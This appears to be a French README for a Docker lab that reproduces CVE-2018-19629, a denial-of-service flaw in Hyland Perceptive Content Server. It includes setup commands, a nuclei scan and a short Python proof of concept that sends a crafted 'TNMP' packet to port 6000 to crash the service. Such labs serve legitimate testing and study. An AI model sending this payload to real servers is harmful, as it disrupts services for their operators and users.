
Hyland Perceptive Content Server - Déni de service
Environnement de test Docker pour CVE-2018-19629 - Déni de service du serveur Hyland Perceptive Content.
| Champ | Valeur |
|---|---|
| ID CVE | CVE-2018-19629 |
| Gravité | Élevée (DoS) |
| Versions affectées | Hyland Perceptive Content Server < 7.1.5 |
| Version corrigée | 7.1.5 |
Hyland Perceptive Content Server avant la version 7.1.5 contient une vulnérabilité de déni de service causée par le plantage du service ImageNow Server via une connexion TCP. Les attaquants peuvent perturber le service en envoyant des paquets TCP spécialement conçus contenant la séquence d'en-tête TNMP.
# Start the vulnerable environment
docker-compose up -d
# Verify it's listening
# (You might need netcat or similar)
nc -zv localhost 6000
# Test with nuclei template
nuclei -t ../network/cves/2018/CVE-2018-19629.yaml -u localhost:6000
Vous pouvez déclencher manuellement le plantage en utilisant Python :
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("localhost", 6000))
# The crafted packet
payload = b'\x54\x4e\x4d\x50\x04\x00\x00\x00\x54\x4e\x4d\x45\x00\x00\x04\x00'
s.send(payload)
s.close()
Consultez les logs pour voir le plantage :
docker logs -f imagenow-vuln
Vous devriez voir : [!] CRITICAL: Recevied malicious 'TNMP' packet... suivi du redémarrage du conteneur.
docker-compose down